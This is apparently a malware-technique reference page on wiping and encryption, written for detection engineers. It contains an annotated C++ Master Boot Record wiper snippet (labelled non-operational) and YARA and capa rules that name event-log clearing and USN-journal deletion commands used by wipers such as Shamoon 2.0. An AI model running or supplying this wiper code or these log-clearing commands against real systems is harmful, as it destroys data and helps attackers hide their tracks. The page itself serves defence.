Wiping or Encrypting

Malware can use wiping or encryption techniques to remove its traces from the system. These techniques can also serve as a decoy, or be used directly for sabotage operations.

U0301

Code Snippets

Unprotect

Description

Warning: the code below is a simple MBR wiper. It is currently not operational for obvious reasons.

#include <Windows.h>
#include <iostream>
#include <ctime>
#include <stdio.h>

#define MBR_SIZE 512   // one disk sector; the Master Boot Record occupies the first sector of the drive

using namespace std;

// Illustrative MBR-overwrite routine: zeroes the first MBR_SIZE bytes of the
// first physical disk. The snippet is deliberately left incomplete and does not
// build as written (see the warning above), so it is for reading only.
//
// Defender notes: the observable behaviour is a user-mode process opening the
// raw device object \\.\PhysicalDrive0 with GENERIC_ALL and then issuing a
// WriteFile against that handle. Raw physical-drive handle opens from ordinary
// processes, and writes landing on sector 0, are the telemetry to alert on;
// such an open normally requires administrative privileges.
//
// Returns 0 unconditionally; neither the CreateFile result
// (INVALID_HANDLE_VALUE on failure) nor the WriteFile result is checked.
int WipeMBR(void) {
    char dmbr[MBR_SIZE];                      // 512-byte buffer of zeros written over the MBR

    ZeroMemory(&dmbr, sizeof(dmbr));          // the payload is simply all-zero bytes
    // Opens the raw disk, not a filesystem path: this is the primary detection point.
    HANDLE disk = CreateFile((LPCSTR)"\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    // A freshly opened handle is positioned at offset 0, so this write lands on
    // the first sector (the MBR) — the disk becomes unbootable.
    WriteFile(disk, dmbr, MBR_SIZE, &write, NULL);
    CloseHandle(disk);
    return 0;
}

// Entry point: prints a marker line and calls WipeMBR once. Non-functional as
// shipped (the snippet above does not build); the console message is the only
// user-visible output.
int main() {
    cout << "Start Wiping" << endl;
    WipeMBR();                                // return value is always 0 and is ignored here
    return 0;
}

Detection Rules

// Flags PE files that embed the command-line fragments used to clear Windows
// event logs (wevtutil.exe cl / sl) and to delete the NTFS USN change journal
// (fsutil usn deletejournal). Requiring 4 of the 7 strings keeps the rule from
// firing on a binary that merely references wevtutil.exe. Legitimate
// administrative tooling can still carry these strings, so treat hits as a
// triage lead rather than a verdict.
rule UNPROTECT_wiping_event
{
    meta:
        description = "Rule to detect wiping events logs"
        author = "McAfee ATR team | Thomas Roccia"
        date = "2020-11-10"
        rule_version = "v1"
        mitre = "T1070"
        hash = "c063c86931c662c1a962d08915d9f3a8"

    strings:
        $s1 = "wevtutil.exe" ascii wide nocase             // Windows event log command-line utility
        $s2 = "cl Application" ascii wide nocase           // "wevtutil cl <log>" clears the named log
        $s3 = "cl System" ascii wide nocase
        $s4 = "cl Setup" ascii wide nocase
        $s5 = "cl Security" ascii wide nocase
        $s6 = "sl Security /e:false" ascii wide nocase     // "wevtutil sl <log> /e:false" disables the log
        $s7= "usn deletejournal /D" ascii wide nocase      // "fsutil usn deletejournal /D" removes the USN change journal

    condition:
        uint16(0) == 0x5a4d and 4 of them                  // 0x5a4d = "MZ": restrict to PE executables
}

import "pe"

// Detects the Shamoon 2.0 wiper component. For a PE under 1000KB any two of
// the four strings suffice; otherwise three are required, which lets the rule
// still fire on memory dumps or non-PE carriers that contain the markers.
rule Shamoon2_Wiper {
   meta:
      description = "Detects Shamoon 2.0 Wiper Component"
      author = "Florian Roth"
      reference = "https://goo.gl/jKIfGB"
      date = "2016-12-01"
      score = 70
      hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
      hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
   strings:
      $a1 = "\\??\\%s\\System32\\%s.exe" fullword wide   // NT-namespace path format string for an executable under System32
      // Long opaque alphabetic blob hard-coded in the sample; its role is not stated by the rule.
      $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
      $s1 = "UFWYNYNTS" fullword wide                     // short opaque marker string from the sample
      $s2 = "\\\\?\\ElRawDisk" fullword wide               // device name of the EldoS RawDisk driver (see EldoS_RawDisk below) used for raw disk writes
   condition:
      ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
}

// Detects the EldoS RawDisk device driver. The driver is commercial software
// that grants raw disk access, which is why the score is lower than the
// Shamoon2_Wiper rule above: its presence is a strong indicator in the context
// of a wiper, but not malicious on its own. Requires a PE under 2000KB and
// 4 of the 10 string/opcode patterns.
rule EldoS_RawDisk {
   meta:
      description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
      author = "Florian Roth (with Binar.ly)"
      reference = "https://goo.gl/jKIfGB"
      date = "2016-12-01"
      score = 50
      hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
      hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
   strings:
      $s1 = "g\\system32\\" fullword wide                  // path fragment found in the driver binary
      // $s2-$s7: short opaque tokens present in the driver binary; their meaning is not stated by the rule.
      $s2 = "ztvttw" fullword wide
      $s3 = "lwizvm" fullword ascii
      $s4 = "FEJIKC" fullword ascii
      $s5 = "INZQND" fullword ascii
      $s6 = "IUTLOM" fullword wide
      $s7 = "DKFKCK" fullword ascii

      // $op1-$op3: raw opcode byte sequences taken from the driver's code.
      $op1 = { 94 35 77 73 03 40 eb e9 }
      $op2 = { 80 7c 41 01 00 74 0a 3d }
      $op3 = { 74 0a 3d 00 94 35 77 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )
}
# capa rule: flags a basic block that clears a Windows event log via the
# low-level advapi32 export ElfClearEventLogFile. The OpenEventLog call is
# optional because the log handle may have been obtained in another block.
# Mapped to ATT&CK T1070.001 (Clear Windows Event Logs).
rule:
  meta:
    name: clear the Windows event log
    namespace: anti-analysis/anti-forensic/clear-logs
    author: michael.hunhoff@fireeye.com
    scope: basic block                      # all features must occur within a single basic block
    att&ck:
      - Defense Evasion::Indicator Removal on Host::Clear Windows Event Logs [T1070.001]
    examples:
      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0   # sample hash : address of a matching block
  features:
    - and:
      - api: advapi32.ElfClearEventLogFile  # required: the call that performs the clear
      - optional:
        - api: advapi32.OpenEventLog        # optional: acquiring the log handle

Additional Resources
